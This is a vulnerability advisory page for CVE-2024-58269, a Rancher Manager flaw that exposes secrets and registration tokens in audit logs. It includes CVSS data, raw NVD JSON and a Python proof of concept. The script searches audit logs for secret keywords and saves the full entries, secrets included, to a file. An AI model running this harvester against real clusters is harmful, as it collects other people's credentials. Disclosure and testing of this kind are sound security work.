Security Vulnerability Report

CVE-2024-58269

Published: 2025-10-29 15:15:41
Last Modified: 2026-04-15 00:35:42

Description

A vulnerability has been identified in Rancher Manager, where sensitive information, including secret data, cluster import URLs, and registration tokens, is exposed to any entity with access to Rancher audit logs.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available in the CVE record; the affected versions below are:

Rancher Manager < 2.7.14
Rancher Manager < 2.8.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2024-58269 PoC - Rancher Manager audit log sensitive information disclosure
# Requires: Valid Rancher API token with low privileges and audit log access
import json
from datetime import datetime, timedelta

import requests

RANCHER_URL = "https://rancher.example.com"
API_TOKEN = "token-xxxxx:xxxxxxxxxxxxxxx"

HEADERS = {
    "Authorization": f"Bearer {API_TOKEN}",
    "Content-Type": "application/json",
}


def get_audit_logs(since=None, until=None):
    """Fetch Rancher audit logs, optionally bounded by ISO-8601 timestamps."""
    params = {"limit": 100, "sortBy": "date"}
    if since:
        params["since"] = since
    if until:
        params["until"] = until

    # verify=False accepts Rancher's self-signed certificate; raise_for_status()
    # fails loudly on an HTTP error instead of trying to parse an error page.
    response = requests.get(
        f"{RANCHER_URL}/v1/auditLogs",
        headers=HEADERS,
        params=params,
        verify=False,
        timeout=30,
    )
    response.raise_for_status()
    return response.json()


def extract_sensitive_data(log_entry):
    """Return the sensitive field names found in a log entry (case-insensitive)."""
    sensitive_patterns = [
        "password", "secret", "token", "credential", "apiKey",
        "privateKey", "clusterToken", "importToken", "registrationToken",
    ]
    extracted = {}
    # The entry is serialised and lower-cased, so each pattern must be
    # lower-cased as well, otherwise camelCase names such as apiKey never match.
    log_data = json.dumps(log_entry).lower()
    for pattern in sensitive_patterns:
        if pattern.lower() in log_data:
            extracted[pattern] = "FOUND"
    return extracted


def main():
    print("[*] CVE-2024-58269 - Rancher Manager Audit Log Information Disclosure")
    print("[*] Scanning for sensitive data in audit logs...\n")

    # Fetch the audit logs from the last 24 hours
    since = (datetime.now() - timedelta(days=1)).isoformat()
    logs = get_audit_logs(since=since)

    sensitive_findings = []
    for log in logs.get("data", []):
        sensitive = extract_sensitive_data(log)
        if sensitive:
            finding = {
                "timestamp": log.get("timestamp"),
                "eventType": log.get("eventType"),
                "user": log.get("user", {}).get("name"),
                "resource": log.get("resource"),
                "sensitiveFields": sensitive,
                "rawLog": log,  # full log entry, including the sensitive data
            }
            sensitive_findings.append(finding)
            print("[!] Found sensitive data in log entry:")
            print(f"    Timestamp: {finding['timestamp']}")
            print(f"    Event: {finding['eventType']}")
            print(f"    Sensitive Fields: {list(sensitive.keys())}")
            print()

    print(f"[*] Total sensitive findings: {len(sensitive_findings)}")

    # Export the full results
    if sensitive_findings:
        output_file = f"cve_2024_58269_findings_{datetime.now().strftime('%Y%m%d_%H%M%S')}.json"
        with open(output_file, "w") as f:
            json.dump(sensitive_findings, f, indent=2)
        print(f"[+] Results exported to: {output_file}")


if __name__ == "__main__":
    main()

References

https://bugzilla.suse.com/show_bug.cgi?id=CVE-2024-58269
https://github.com/rancher/rancher/security/advisories/GHSA-mw39-9qc2-f7mg

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2024-58269",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-29T15:15:41.077",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A vulnerability has been identified in Rancher Manager, where sensitive \ninformation, including secret data, cluster import URLs, and \nregistration tokens, is exposed to any entity with access to Rancher \naudit logs."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-532"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://bugzilla.suse.com/show_bug.cgi?id=CVE-2024-58269",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/rancher/rancher/security/advisories/GHSA-mw39-9qc2-f7mg",
        "source": "[email protected]"
      }
    ]
  }
}